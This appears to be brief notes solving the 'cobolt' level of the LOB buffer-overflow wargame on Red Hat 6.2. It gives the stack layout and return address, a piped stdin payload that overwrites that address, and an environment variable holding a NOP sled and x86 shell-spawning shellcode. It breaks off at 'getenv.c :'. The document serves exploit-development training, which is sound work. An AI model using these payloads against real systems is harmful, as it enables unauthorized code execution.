LOB Redhat 6.2 - cobolt

cobolt - small buffer + stdin

Stack : buffer[16] + sfp[4] + ret[4]

return address : 0xbffffeb9

Payload : (python -c 'print "A"*20 + "\xb9\xfe\xff\xbf"';cat) | ./goblin

Environment Variable : export shell=`python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`

getenv.c : 

Using Environment Variable